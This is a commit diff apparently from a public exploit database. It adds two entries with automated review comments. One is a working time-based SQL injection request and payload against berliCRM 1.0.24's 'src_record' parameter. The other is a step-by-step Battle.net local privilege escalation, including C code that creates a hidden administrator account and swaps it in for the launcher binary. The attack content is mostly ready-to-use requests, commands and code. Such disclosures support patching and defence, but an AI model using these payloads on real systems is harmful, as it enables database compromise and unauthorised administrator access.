DB: 2020-10-14
2 changes to exploits/shellcodes Battle.Net 1.27.1.12428 - Insecure File Permissions berliCRM 1.0.24 - 'src_record' SQL Injection
This commit is contained in:
parent
14fcd4863f
commit
973a669c08
3 changed files with 136 additions and 0 deletions
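--- a/exploits/php/webapps/48872.txt
+++ b/exploits/php/webapps/48872.txt
@@ -0,0 +1,35 @@
+# Exploit Title: berliCRM 1.0.24 - 'src_record' SQL Injection
+# Google Dork: N/A
+# Date: 2020-10-11
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.berlicrm.de
+# Software Link: https://github.com/berliCRM/berlicrm/archive/1.0.24.zip
+# Version: 1.0.24
+# Tested on: Kali Linux
+# CVE : N/A
+
+
+========== Post Request =========================
+
+POST /index.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Referer: localhost
+Cookie: PHPSESSID=bab89b6fc39e1fd2c26877a4544cbb64
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate
+Content-Length: 226
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
+Connection: Keep-alive
+
+__vtrftk=sid:ff114f440469f69f1507ebd04c65e05ba2fcc8d3%2C1602392658&module=Contacts&src_field=contact_id&src_module=Contacts&src_record=1&triggerEventName=postSelection721&view=Popup
+
+============= Vulnerable Parameter ===============
+
+src_record (POST)
+
+============= Payload ===========================
+
+0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z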
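Review bot: The header block documents the attacking host rather than the affected deployment — `# Tested on: Kali Linux` says nothing about the web server, PHP or database behind `/index.php`, even though the `sleep(6)`/`sysdate()` payload is database-specific and is the only evidence offered. The entry also carries no fixed-version or vendor-notification line, so a maintainer triaging it cannot tell whether 1.0.24 is the last affected release; a `# Fixed in: <not reported>` line next to `# CVE : N/A` would make that explicit. The `Cookie:` and `__vtrftk` values are instance-specific session data and would benefit from being labelled as such so they are not read as fixed identifiers.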
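--- a/exploits/windows/local/48873.txt
+++ b/exploits/windows/local/48873.txt
@@ -0,0 +1,99 @@
+# Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions
+# Date: 2020-10-09
+# Exploit Author: George Tsimpidas
+# Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop )
+# Version Patch: 1.27.1.12428
+# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
+# Category: local
+
+
+
+Vulnerability Description:
+
+Battle.Net Launcher (Battle.net.exe) suffers from an elevation of
+privileges
+vulnerability which can be used by a simple user that can change the
+executable file
+with a binary of choice. The vulnerability exist due to the improper
+permissions,
+with the 'F' flag (Full) for 'Users' group, making the entire directory
+'Battle.net' and its files and sub-dirs world-writable.
+
+## Insecure Folder Permission
+
+C:\Program Files (x86)>icacls Battle.net
+
+Battle.net BUILTIN\Users:(OI)(CI)(F)
+BUILTIN\Administrators:(OI)(CI)(F)
+CREATOR OWNER:(OI)(CI)(F)
+
+## Insecure File Permission
+
+C:\Program Files (x86)\Battle.net>icacls "Battle.net.exe"
+
+Battle.net.exe BUILTIN\Users:(I)(F)
+BUILTIN\Administrators:(I)(F)
+FREY-OMEN\30698:(I)(F)
+
+
+## Local Privilege Escalation Proof of Concept
+#0. Download & install
+
+#1. Create low privileged user & change to the user
+## As admin
+
+C:\>net user lowpriv Password123! /add
+C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
+User name lowpriv
+Local Group Memberships *Users
+Global Group memberships *None
+
+#2. Move the Service EXE to a new name
+
+C:\Program Files (x86)\Battle.net> whoami
+
+lowpriv
+
+C:\Program Files (x86)\Battle.net> move Battle.net.exe Battle.frey.exe
+1 file(s) moved.
+
+#3. Create malicious binary on kali linux
+
+## Add Admin User C Code
+kali# cat addAdmin.c
+int main(void){
+system("net user placebo mypassword /add");
+system("net localgroup Administrators placebo /add");
+WinExec("C:\\Program Files (x86)\\Battle.net\\Battle.frey.exe>",0);
+return 0;
+}
+
+## Compile Code
+kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe
+
+#4. Transfer created 'Battle.net.exe' to the Windows Host
+
+#5. Move the created 'Battle.net.exe' binary to the 'C:\Program Files
+(x86)\Battle.net>' Folder
+
+C:\Program Files (x86)\Battle.net> move
+C:\Users\lowpriv\Downloads\Battle.net.exe .
+
+#6. Check that exploit admin user doesn't exists
+
+C:\Program Files (x86)\Battle.net> net user placebo
+
+The user name could not be found
+
+#6. Reboot the Computer
+
+C:\Program Files (x86)\Battle.net> shutdown /r
+
+#7. Login & look at that new Admin
+
+C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
+/v "Full"
+
+User name placebo
+Local Group Memberships *Administrators *Users
+Global Group memberships *None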
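Review bot: The step list numbers two consecutive steps `#6.` (`#6. Check that exploit admin user doesn't exists` and `#6. Reboot the Computer`) before jumping to `#7.`, so the sequence should read `#6.`/`#7.`/`#8.`. The advisory also stops at the finding: the `icacls` output shows `BUILTIN\Users:(OI)(CI)(F)` on the install directory and `BUILTIN\Users:(I)(F)` on `Battle.net.exe`, but there is no remediation or fixed-version line, and a `# Fix:` line stating that the installer should keep the default inherited Program Files ACLs (Users with read/execute only, no write or Full control) would let readers check whether a later build is still affected. In the description, `The vulnerability exist due to the improper permissions,` should read `The vulnerability exists due to improper permissions,`, and `sub-dirs world-writable` more precisely means writable by every member of the local Users group, which is what the ACL shown establishes.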
|
@ -10387,6 +10387,7 @@ id,file,description,date,author,type,platform,port
|
|||
48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows,
|
||||
48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
|
||||
48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
|
||||
48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
|
||||
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
|
||||
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
|
||||
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
|
||||
|
@ -40690,6 +40691,7 @@ id,file,description,date,author,type,platform,port
|
|||
48869,exploits/multiple/webapps/48869.txt,"Liman 0.7 - Cross-Site Request Forgery (Change Password)",2020-10-12,"George Tsimpidas",webapps,multiple,
|
||||
48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
|
||||
48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
|
||||
48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
|